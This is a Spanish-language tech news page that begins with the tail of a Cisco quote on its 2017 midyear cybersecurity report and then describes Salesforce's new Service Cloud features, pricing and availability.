“La complejidad continúa obstaculizando los esfuerzos de seguridad de muchas organizaciones. Es obvio que los años de invertir en productos puntuales que no pueden integrarse están creando enormes oportunidades para los atacantes, que pueden identificar fácilmente vulnerabilidades pasadas por alto o vacíos en los esfuerzos de seguridad. Para reducir eficazmente el tiempo de detección y limitar el impacto de un ataque, la industria debe pasar a un enfoque más integrado y arquitectónico que aumente la visibilidad y la capacidad de gestión, lo que permite a los equipos de seguridad cerrar las brechas “, dijo David Ulevitch, vicepresidente senior y gerente general del Grupo de Negocio de Seguridad, Cisco

Más información
Cisco 2017 Midyear Cybersecurity Report

Presentan próxima generación de Salesforce Service Cloud

De acuerdo con lo informado, las compañías podrán configurar e instalar Service Cloud en un solo día. Asimismo, la nueva Lightning Service Console agrega nuevas capacidades para impulsar la productividad de los representantes.

Salesforce afirmó que el nuevo Service Cloud, basado en la estructura de componentes Salesforce Lightning, “atiende las necesidades del cliente de hoy, quien espera experiencias de servicio rápidas, personalizadas y disponibles a través de sus canales de preferencia”.

De esta manera, Service Cloud promete a todas las compañías, si importar su tamaño, una plataforma de servicio al cliente “flexible y moderna que es fácil de instalar, aprender y personalizar para satisfacer las necesidades presentes y futuras”.

Entre las innovaciones en Service Cloud se puede destacar que el manejo de casos ahora se encuentra preintegrado, al tiempo que una nueva experiencia de instalación simplifica los pasos necesarios para implementar flujos de servicio esenciales, con clics, sin la necesidad de programación. Los administradores del sistema pueden agregar una comunidad de clientes y una base de conocimientos, así como conectarse al correo electrónico y a las fuentes de Facebook y Twitter, en ocasiones en tan sólo cinco pasos.

Asimismo, AppExchange and Lightning App Builder for Service ofrece a los equipos de servicio una manera sencilla de personalizar y expandir Service Cloud. ampliando la funcionalidad con sólo arrastrar y soltar en Service Cloud alguno de los nuevos componentes de servicio Lightning, tales como la barra lateral de conocimientos o el registro relevante.

Por otra parte, las compañías pueden ampliar aún más la funcionalidad de Service Cloud con las más de 75 aplicaciones de servicio de los socios listas para Lightning disponibles en AppExchange.

En lo que respecta a la experiencia de escritorio unificada para los representantes de servicio al cliente, a través de Lightning Service Console, se incluyen varias capacidades nuevas, como Case Kanban, que proporciona un panel de control visual de los casos en espera; Community Agent 360, que muestra la historia del cliente en la comunidad; y Federated Search, que lo ayuda a encontrar los registros rápidamente en las fuentes de datos de Salesforce y en las externas como ConfluenceYouTubeDropbox and Box. Finalmente, Macro Builder les permite crear macros reutilizables al instante para casos de servicio específicos que pueden consultar rápidamente si el problema vuelve a surgir.

Finlamente, la aplicación Service Cloud Mobile para iOS y Android nativa, permitirá a los representantes brindar un servicio personalizado al cliente desde cualquier lugar.

Precio y disponibilidad
Service Out-of-the-Box, Lightning App Builder for Service, Lightning Service Console, Federated Search y Case Kanban ya están disponibles sin costo con cualquier edición de Service CloudService Cloud.

Community Agent 360 ya está disponible en versión piloto sin costo con una licencia de Customer Community Cloud.

Se espera que Macro Builder esté disponible en el segundo semestre del 2017 sin costo con cualquier edición de Service Cloud.

Se espera que la aplicación Service Cloud Mobile para iOS y Android esté disponible en versión piloto en el segundo semestre del 2017 sin costo con cualquier edición de Service Cloud.